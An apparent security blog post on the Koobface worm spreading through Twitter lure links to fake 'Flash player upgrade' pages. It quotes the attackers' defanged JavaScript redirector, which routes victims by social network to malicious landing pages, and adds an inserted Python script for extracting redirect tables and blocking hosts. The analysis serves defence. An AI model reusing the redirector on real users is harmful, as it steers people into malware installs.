Tertwit? or Twitter Tweet Links Redirect to Koobface

koob-Face or ter-Twit? The ongoing abuse of Twitter feeds by malware distributors continues to net more social networking victims. As always, be wary of any executable you are prompted to download and execute. Currently, evil tweets for “My home video :) ” or “cool video! WOW!” redirect to a set of spoofed social network pages. The malicious pages present visiting users with a prompt for a plugin install, “Flash player upgrade required”. An example here:

The malicious Koobface worm that ThreatFire has been preventing on desktops is served up and named “setup.exe” from this site. Interestingly, a number of these IP addresses serving up Koobface have been in use by Waledac distributors.

The ThreatFire community has been reporting the Koobface nastiness being served from multiple web servers today, with fairly heavy Koobface volume from web servers hosted on these IP addresses:

Update: Thankfully, as the malware distributors have changed some of their tweet tactics, their web server at kukuruku-290709. com has been pulled out from under them. Here is an example portion of JavaScript (mods mine) hosted on redirect pages that examines the victim’s search URL and, based on a list of extremely popular social networking sites, redirects them to a variety of spoofed pages:

// KROTEG
var abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook. com',  abc+'fb.php'],
['tagged. com',    abc+'tg.php'],
['friendster. com',abc+'fr.php'],
['myspace. com',   abc+'ms.php'],
['msplinks. com',  abc+'ms.php'],
['myyearbook. com',abc+'yb.php'],
['fubar. com',     abc+'fu.php'],
['twitter. com',   abc+'tw.php'],
['hi5. com',       abc+'hi5.php'],
['bebo. com',      abc+'be.php']];
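For analysts triaging one of these redirect pages, the useful output is the lure-domain to landing-URL table and the host(s) to block. The following is an added example (not the post's code, nor the attacker's) that pulls that table out of a Koobface-style script; the sample script embedded in it is constructed to mirror the snippet above, with the URLs left defanged exactly as the post writes them.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the snippet quoted in the post; the URLs stay
# defanged ("hxxp", "name. com") exactly as the post writes them.
SAMPLE_SCRIPT = """
// KROTEG
var abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook. com',  abc+'fb.php'],
['twitter. com',   abc+'tw.php'],
['bebo. com',      abc+'be.php']];
"""

VAR_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")    # var abc1 = '...'
ALIAS_RE = re.compile(r"\b(\w+)\s*=\s*(\w+)\s*;")       # abc = abc1;
PAIR_RE = re.compile(r"\[\s*'([^']+)'\s*,\s*(\w+)\s*\+\s*'([^']+)'\s*\]")

def refang(s):
    """Undo the defanging so the strings can be parsed as real URLs."""
    return s.replace("hxxp", "http").replace(". ", ".")

def extract_redirects(script):
    """Map each lure domain to the set of landing URLs the script may send it to."""
    consts = dict(VAR_RE.findall(script))
    aliases = {}                       # abc -> {abc1, abc2}: chosen at runtime
    for lhs, rhs in ALIAS_RE.findall(script):
        if rhs in consts:
            aliases.setdefault(lhs, set()).add(rhs)
    table = {}
    for domain, prefix, page in PAIR_RE.findall(script):
        names = aliases.get(prefix, {prefix})
        urls = {refang(consts[n] + page) for n in names if n in consts}
        if urls:
            table[refang(domain)] = urls
    return table

def landing_hosts(table):
    """Hosts to block and hunt for in proxy logs: every landing URL's host."""
    return {urlparse(u).netloc for urls in table.values() for u in urls}

if __name__ == "__main__":
    t = extract_redirects(SAMPLE_SCRIPT)
    for d, urls in sorted(t.items()):
        print(d, "->", ", ".join(sorted(urls)))
    print("block:", landing_hosts(t))
```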

Again, if you are a user of these sites and receive a tweet from someone you don’t know that redirects you to a page that serves up an executable download, be very suspicious. And of course, run a behavior-based solution like ThreatFire as a layer on your system.


One Response to Tertwit? or Twitter Tweet Links Redirect to Koobface

  1. Roseann Dukette says:

    ohhh awesome info
